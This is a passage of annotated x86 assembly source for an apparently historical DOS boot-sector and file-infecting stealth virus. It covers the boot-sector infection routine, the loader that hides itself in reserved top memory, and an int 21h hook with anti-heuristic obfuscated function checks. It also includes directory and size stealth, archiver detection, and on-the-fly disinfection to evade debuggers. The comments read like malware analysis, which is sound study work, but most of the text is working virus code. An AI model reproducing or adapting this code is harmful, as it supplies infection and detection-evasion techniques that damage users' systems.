;Get heads parameter
mov cx,word ptr es:[bx+1Ah]
push cx
;Divide tracks by heads
div cx
push ax
xchg ah,al
mov cl,06h
shl al,cl
or al,01h
;Save virus body position in floopy
mov word ptr cs:[load_cx],ax
pop ax
pop cx
xor dx,dx
div cx
mov byte ptr cs:[load_dh],dl
;Use floppy root directory for old boot sector
mov cx,000Eh
mov dx,0100h
;Write original boot sector
mov ax,0301h
pushf
call dword ptr cs:[old13h]
jc exit13h_inf
ok_original:
;Move virus loader into boot sector
push cs
pop ds
mov si,offset boot_code
mov cx,boot_size
cld
rep movsb
write_boot:
;Reset disk controler
xor ax,ax
pushf
call dword ptr cs:[old13h] ;************old13h]
;Write loader
mov ax,0301h
xor dx,dx
mov cx,0001h
pushf
call dword ptr cs:[old13h] ;+++++++++++old13h]
jnc ok_loader
exit13h_inf:
call pop_all
stc
cmc
retf 2
ok_loader:
;Set boot flag
mov byte ptr cs:[prog_type],"B"
;Perform encryption
call do_encrypt
push cs
pop es
;Write virus body
mov cx,word ptr cs:[load_cx]
mov dh,byte ptr cs:[load_dh]
mov bx,offset virus_copy
mov ax,0300h+sector_size
pushf
call dword ptr cs:[old13h] ;+++++++++++++old13h]
;Hide changes made to boot sector
stealth_boot:
call pop_all
mov cl,03h
mov al,01h
mov cl,0Eh
mov dh,01h
jmp dword ptr cs:[old13h]
;----------------------------------------------------------------------------
;Code inserted into boot sector
;----------------------------------------------------------------------------
boot_code:
;Boot-sector loader: this is the code the infection routine copies into the
;floppy boot sector, so the BIOS enters it at 0000:7C00 on boot.
;Set ss/es/ds = 0 and place the stack at 0000:7C00 (it grows down, below the
;loaded boot sector). Interrupts stay masked while ss:sp is inconsistent.
cli
xor ax,ax
mov ss,ax
mov es,ax
mov ds,ax
mov si,7C00h
mov sp,si
sti
;Allocate some BIOS memory: 0000:0413h is the BIOS data-area word holding the
;base memory size in KB. Subtracting (lenvir/512)+1 KB removes that much from
;the top of conventional memory before DOS ever sees it, so the resident body
;lives in memory DOS never allocates (top-of-memory residency; the reduced
;total reported by CHKDSK/MEM is the observable symptom).
sub word ptr ds:[0413h],(lenvir/512)+1
mov ax,word ptr ds:[0413h]
;Calculate residence address: KB * 64 = segment (paragraph) address of the
;first hidden kilobyte, so es:0000 is where the virus body will be read.
mov cl,06h
shl ax,cl
mov es,ax
;Reset disk (ah=00h). dl (drive) is not set anywhere in the loader; it
;presumably still holds the boot-drive number left by the ROM bootstrap - confirm.
xor ax,ax
int 13h
;Get position in disk. The next two instructions are hand-encoded opcodes so
;that their immediates can be patched by the infection routine:
;  0B9h = mov cx,imm16  (int 13h cylinder/sector word, stored in load_cx)
;  0B6h = mov dh,imm8   (int 13h head number, stored in load_dh)
;mov cx,XXXXh
db 0B9h
load_cx dw 0000h
;mov dh,XXh
db 0B6h
load_dh db 00h
;Prepare for reading virus body: ah=02h (BIOS read sectors), al=sector_size,
;which is used here as a sector count, not a byte size.
;No branch back to try_again is visible in this listing; a failed read goes
;straight to error_init rather than retrying.
try_again:
mov ax,0200h+sector_size
;Read at es:bx = es:0000, the start of the hidden memory block
xor bx,bx
;Read virus body into allocated memory
int 13h
jc error_init
;Continue execution on virus body: push es / push bx / retf is a far jump to
;es:0000, i.e. the first byte of the body just loaded (bx is still 0 here).
push es
push bx
retf
;Error during virus initialization: int 18h is the BIOS "boot failure"/ROM
;BASIC entry, so a bad read abandons the boot instead of falling through into
;the marker bytes below.
error_init:
int 18h
;----------------------------------------------------------------------------
;Infection marker
;----------------------------------------------------------------------------
;Two-byte marker "CR" at the end of the loader, presumably checked by the
;infection routine to avoid re-infecting a sector. Together with the 0413h
;decrement above it is a usable scanner signature for this loader.
boot_marker db "CR"
;End of boot code
boot_end:
;----------------------------------------------------------------------------
;Virus int 21h
;----------------------------------------------------------------------------
my_int21h:
;Resident int 21h handler. Runs on every DOS call: saves the caller's
;registers, hooks int 24h and int 03h for the duration of the call, decides
;whether stealth should be suppressed for this process, then dispatches on the
;DOS function number. Anything not handled falls through to the original
;int 21h at m21h_exit.
call push_all
;Set int 21h running switch
mov byte ptr cs:[running_sw],"F"
;Anti-heuristic function number examination: store the complemented function
;word (ah:al xor FFFFh) so that the well-known DOS function numbers never
;appear as plain compare immediates below - every cmp uses (nn xor 0FFh),
;evaluated at assembly time.
xor ax,0FFFFh
mov word ptr cs:[dos_function],ax
;Save old int 24h (critical error handler). get_int is not in view; from the
;stores below it returns the vector in es:bx.
mov al,24h
call get_int
mov word ptr cs:[old24h_seg],es
mov word ptr cs:[old24h_off],bx
;Hook int 24h to a do-nothing handler so a write-protected or failing disk
;never produces the "Abort, Retry, Fail?" prompt while the virus is working.
push cs
pop ds
mov dx,offset my_int24h
mov al,24h
call set_int
;Save old int 03h (the breakpoint vector)
mov al,03h
call get_int
mov word ptr cs:[old03h_seg],es
mov word ptr cs:[old03h_off],bx
;Hook int 03h to original int 21h: from here on every "int 03h" in the
;handler is a call into the real DOS. Besides hiding the int 21h calls, this
;breaks any debugger that relies on int 3 breakpoints while the handler runs.
;unhook_ints (not in view) presumably restores both vectors before exit.
lds dx,dword ptr cs:[old21h]
mov al,03h
call set_int
;Check for special files: ah=51h = Get current PSP segment in bx (undocumented
;DOS 2+; ah=62h is the documented DOS 3+ equivalent, hence the original note).
mov ah,51h ;62h?
int 03h
;The memory control block sits one paragraph below the PSP it owns; its owner
;name field is at offset 08h (maintained by DOS 4.0+; on older DOS the bytes
;are not a name and the compares presumably just fail).
dec bx
mov ds,bx
mov ax,word ptr ds:[0008h]
mov byte ptr cs:[stealth_sw],00h
;Check if arj is running. MASM packs "RA" as 5241h while memory is
;little-endian, so this matches a program name beginning with "AR".
cmp ax,"RA"
je disable_stealth
;Check for pkzip utils (name beginning "PK")
cmp ax,"KP"
je disable_stealth
;Check for lha (name beginning "LH")
cmp ax,"HL"
je disable_stealth
;Check for backup (name beginning "BA")
cmp ax,"AB"
je disable_stealth
jmp no_running
disable_stealth:
;Stealth off for archivers/backup tools, presumably so the archived or
;backed-up copy is the real (infected) file rather than a stealthed image.
mov byte ptr cs:[stealth_sw],0FFh
no_running:
;Restore and re-save all regs (ds/ax were clobbered above)
call pop_all
call push_all
;Put function number into bx: bh = ah xor FFh, bl = al xor FFh
mov bx,word ptr cs:[dos_function]
;----------------------------------------------------------------------------
;Infection functions
;----------------------------------------------------------------------------
infection_00:
;Exec function (4B00h, load and execute) -> dos_exec (not in view)
cmp bx,(4B00h xor 0FFFFh)
jne infection_01
jmp dos_exec
infection_01:
;Close file (Handle), 3Eh -> dos_close (not in view). Only bh (= ah) is
;compared, so al is ignored for the single-byte function checks below.
cmp bh,(3Eh xor 0FFh)
jne stealth_dos
jmp dos_close
;----------------------------------------------------------------------------
;Stealth functions
;----------------------------------------------------------------------------
stealth_dos:
;Check if stealth is disabled for this process; if so pass everything else
;through to DOS untouched.
cmp byte ptr cs:[stealth_sw],0FFh
je m21h_exit
;Open file (Handle), 3Dh
cmp bh,(3Dh xor 0FFh)
jne stealth_00
jmp dos_open
stealth_00:
;Extended open, 6Ch (same handler as 3Dh)
cmp bh,(6Ch xor 0FFh)
jne stealth_01
jmp dos_open
stealth_01:
;Directory stealth works with function Findfirst (fcb), 11h
cmp bh,(11h xor 0FFh)
jne stealth_02
jmp ff_fcb
stealth_02:
;Directory stealth works also with function Findnext(fcb), 12h
cmp bh,(12h xor 0FFh)
jne stealth_03
jmp ff_fcb
stealth_03:
;Search stealth works with Findfirst (handle), 4Eh
cmp bh,(4Eh xor 0FFh)
jne stealth_04
jmp ff_handle
stealth_04:
;Search stealth works also with Findnext (handle), 4Fh
cmp bh,(4Fh xor 0FFh)
jne stealth_05
jmp ff_handle
stealth_05:
;Read stealth, 3Fh -> dos_read (not in view)
cmp bh,(3Fh xor 0FFh)
jne stealth_06
jmp dos_read
stealth_06:
;Disinfect if debuggers exec: 4B01h (load but do not execute) is the overlay
;/debugger load path, so the file is cleaned before a debugger can inspect it.
cmp bx,(4B01h xor 0FFFFh)
jne stealth_07
jmp dos_load_exec
stealth_07:
;Disinfect if file write (40h): a program about to modify an infected file
;gets the clean original, avoiding corrupted infections.
cmp bh,(40h xor 0FFh)
jne stealth_08
jmp dos_write
stealth_08:
;Get file date/time, 5700h
cmp bx,(5700h xor 0FFFFh)
jne stealth_09
jmp dos_get_time
stealth_09:
;Set file date/time, 5701h
cmp bx,(5701h xor 0FFFFh)
jne m21h_exit
jmp dos_set_time
;Get control back to dos
m21h_exit:
;Free int 03h and int 24h, restore the caller's registers and chain to the
;original int 21h. Its iret returns straight to the caller, so this handler
;does not see the results of pass-through calls.
call unhook_ints
call pop_all
jmp dword ptr cs:[old21h]
;----------------------------------------------------------------------------
;Directory stealth with functions 11h and 12h (fcb)
;----------------------------------------------------------------------------
ff_fcb:
;Directory stealth for FCB Findfirst/Findnext (11h/12h): let DOS fill the
;DTA, then, if the caller is the shell and the entry carries the infection
;marker, hide the marker and subtract the virus length from the reported size.
;Registers are the caller's again after pop_all, so ds:dx is the caller's FCB.
call pop_all
;Call DOS service (int 03h was pointed at the original int 21h)
int 03h
;Save all regs (al now holds the DOS result)
call push_all
;Check for errors: FCB search functions return al=FFh when nothing was found
cmp al,255
je nofound_fcb
;Get current PSP (ah=51h) in bx
mov ah,51h
int 03h
;Check if call comes from DOS: PSP offset 16h is the parent-PSP segment. Only
;a process that is its own parent (in practice the command shell, whose DIR
;uses FCB searches) gets the stealthed entry; anything else sees the truth.
mov es,bx
cmp bx,es:[16h]
jne nofound_fcb
;First byte of the caller's FCB: FFh means an extended FCB, whose search
;result in the DTA is prefixed by a 7-byte extended header.
mov bx,dx
mov al,ds:[bx+00h]
push ax
;Get DTA (ah=2Fh) in es:bx
mov ah,2Fh
int 03h
pop ax
;inc al turns FFh into 0, so the 7-byte skip applies only to extended FCBs
inc al
jnz fcb_ok
add bx,07h
fcb_ok:
;Check if infected: the DTA holds a drive byte followed by the 32-byte
;directory entry, so +17h is the low byte of the file time. The seconds/2
;field (bits 0-4) set to 1Fh (62 seconds) is the infection marker.
mov ax,word ptr es:[bx+17h]
and al,1Fh
cmp al,1Fh
jne nofound_fcb
;Restore seconds (clear bits 0-4 of the time word)
and byte ptr es:[bx+17h],0E0h
;Restore original file size: 32-bit size at +1Dh/+1Fh minus lenvir
sub word ptr es:[bx+1Dh],lenvir
sbb word ptr es:[bx+1Fh],0000h
nofound_fcb:
;Restore some registers and return. iret restores the caller's own flags from
;the stack; the DOS result for these functions is only in al, which pop_all
;restores from the push_all done after the DOS call.
call unhook_ints
call pop_all
iret
;----------------------------------------------------------------------------
;Search stealth with functions 4Eh and 4Fh (handle)
;----------------------------------------------------------------------------
ff_handle:
;Search stealth for handle Findfirst/Findnext (4Eh/4Fh): let DOS fill the
;DTA, then hide the marker and the size increase on infected entries.
;Unlike ff_fcb there is no caller check here - every program sees the
;stealthed size through these functions.
call pop_all
;Call DOS service (int 03h = original int 21h)
int 03h
jnc ffhok
;Error: return with CF set and DOS's error code in ax. retf 2 discards the
;caller's flags word pushed by int 21h, so the carry set here is what the
;caller sees. Note the registers were not re-saved, so no pop_all is needed.
call unhook_ints
stc
retf 2
ffhok:
;Save result
call push_all
;Get DTA (ah=2Fh) in es:bx
mov ah,2Fh
int 03h
;Check if infected: in the find-handle DTA layout +16h is the file time word;
;seconds/2 field == 1Fh (62 seconds) is the infection marker.
mov ax,word ptr es:[bx+16h]
and al,1Fh
cmp al,1Fh
jne nofound_handle
;Restore seconds field (clear bits 0-4)
and byte ptr es:[bx+16h],0E0h
;Restore original size: 32-bit size at +1Ah/+1Ch minus lenvir
sub word ptr es:[bx+1Ah],lenvir
sbb word ptr es:[bx+1Ch],0000h
nofound_handle:
;Restore some registers and exit with CF clear. stc/cmc is just clc written
;in two instructions; retf 2 drops the saved flags so this CF reaches the caller.
call unhook_ints
call pop_all
stc
cmc
retf 2
;----------------------------------------------------------------------------
;Load exec
;----------------------------------------------------------------------------
dos_load_exec:
;Entry for 4B01h (load, do not execute): open the program named by the
;caller's ds:dx and hand the handle to the disinfection code, so a debugger
;or overlay loader gets a clean file. The handle is closed again at load_error.
;Open file for read-only (ax=3D00h). Read-only is only nominal: do_disinfect
;rewrites the SFT open-mode word to read/write before touching the file.
mov ax,3D00h
int 03h
jnc loaded
;Open failed: pass the original call through untouched
jmp m21h_exit
loaded:
;Handle returned in ax -> bx, where do_disinfect/get_sft expect it
xchg bx,ax
jmp do_disinfect
;----------------------------------------------------------------------------
;Write file
;----------------------------------------------------------------------------
dos_write:
;Entry for 40h (write to handle): the caller is about to modify a file, so
;remove the virus from it first, then (via m21h_exit) let the write proceed
;on the clean file with the caller's original registers.
;pop_all/push_all restores bx to the caller's file handle (bx was overwritten
;with dos_function by the dispatcher).
call pop_all
call push_all
do_disinfect:
;Common disinfection path. In: bx = handle of an open file. Works directly on
;the System File Table entry rather than through the DOS API, which bypasses
;the open mode, attributes and the date/time stamping a normal close would do.
;Get sft address in es:di (get_sft is not in view; per the jc it returns CF
;set when the handle cannot be resolved).
call get_sft
jc bad_operation
;Check if file is already infected: SFT +0Dh is the low byte of the file
;time; seconds/2 field (bits 0-4) == 1Fh is the infection marker. Written as
;and/cmp against ah to avoid a literal 1Fh compare.
mov al,byte ptr es:[di+0Dh]
mov ah,1Fh
and al,ah
cmp al,ah
je clear_header
bad_operation:
;Not infected or no SFT: nothing to clean
jmp load_error
clear_header:
;Save and set file open mode (read/write): SFT +02h, forced to 2 so the
;writes below succeed even if the caller opened the file read-only
mov cx,0002h
xchg cx,word ptr es:[di+02h]
push cx
;Save and set file attribute: SFT +04h cleared (read-only/hidden/system off)
xor al,al
xchg al,byte ptr es:[di+04h]
push ax
;Save and set file pointer position: SFT +15h/+17h (32-bit position)
push word ptr es:[di+15h]
push word ptr es:[di+17h]
;Get file true size if write operation: dos_function+01h is the complemented
;ah, so this tests whether the originating call was 40h.
cmp byte ptr cs:[dos_function+01h],(40h xor 0FFh)
jne no_size_fix
;Add virus size to file size (SFT +11h/+13h). Presumably the open/read stealth
;(not in view) had already reduced the SFT size by lenvir; it is put back so
;the seek-to-end below lands on the real end of file - confirm against dos_open.
add word ptr es:[di+11h],lenvir
adc word ptr es:[di+13h],0000h
no_size_fix:
;Point to old header in file: the last 1Ah bytes of the file hold the saved
;original 19h-byte header followed by the 1-byte XOR key.
call seek_end
sub word ptr es:[di+15h],0019h+01h
sbb word ptr es:[di+17h],0000h
;Read old header and encryption key (ah=3Fh, 1Ah bytes) into cs:virus_copy
push cs
pop ds
mov ah,3Fh
mov cx,0019h+01h
mov dx,offset virus_copy
int 03h
jc exit_disin
;Decrypt header: key is the byte following the 19h header bytes; single-byte
;XOR over the header in place
mov cx,0019h
push dx
pop si
mov al,byte ptr cs:[si+19h]
restore_header:
xor byte ptr cs:[si+00h],al
inc si
loop restore_header
;Write old header back at offset 0.
;NOTE(review): cx = 0019h-01h = 24 bytes are written although 0019h (25) bytes
;were read and decrypted, so the 25th byte of the original header is not
;restored. Whether that byte is meant to be left as-is cannot be told from
;this listing; a disinfected file may differ from the original there.
;The result of this write is not checked.
call seek_begin
mov dx,offset virus_copy
mov ah,40h
mov cx,0019h-01h
int 03h
;Truncate file: seek to end minus lenvir and write zero bytes - DOS truncates
;the file at the current position on a zero-length write. Result not checked.
call seek_end
sub word ptr es:[di+15h],lenvir
sbb word ptr es:[di+17h],0000h
xor cx,cx
mov ah,40h
int 03h
exit_disin:
;Restore file pointer position (pushed in the opposite order above)
pop word ptr es:[di+17h]
pop word ptr es:[di+15h]
;Restore file attribute
pop ax
mov byte ptr es:[di+04h],al
;Restore file open mode
pop word ptr es:[di+02h]
;Do not set file date and file time on closing: bit 40h of the SFT device
;info byte (+06h) is the "file not written" flag, so close keeps the old stamp
or byte ptr es:[di+06h],40h
;Clear seconds field: remove the 62-second infection marker from the SFT time
and byte ptr es:[di+0Dh],0E0h
load_error:
;Check if write function: for the 40h path the handle belongs to the caller
;and stays open; for the 4B01h path it was opened by dos_load_exec and is
;closed here (even when get_sft failed or the file was not infected).
cmp byte ptr cs:[dos_function+01h],(40h xor 0FFh)
je not_load
;Close file (ah=3Eh, bx = handle)
mov ah,3Eh
int 03h
not_load:
;Pass the original call through to DOS with the caller's registers
jmp m21h_exit
;----------------------------------------------------------------------------
;Get file date/time
;----------------------------------------------------------------------------
dos_get_time:
call pop_all
;Call function
int 03h
jnc ok_get_time
;Exit if error
call unhook_ints
stc
retf 2
ok_get_time:
call push_all
;Check if file is already infected
mov al,cl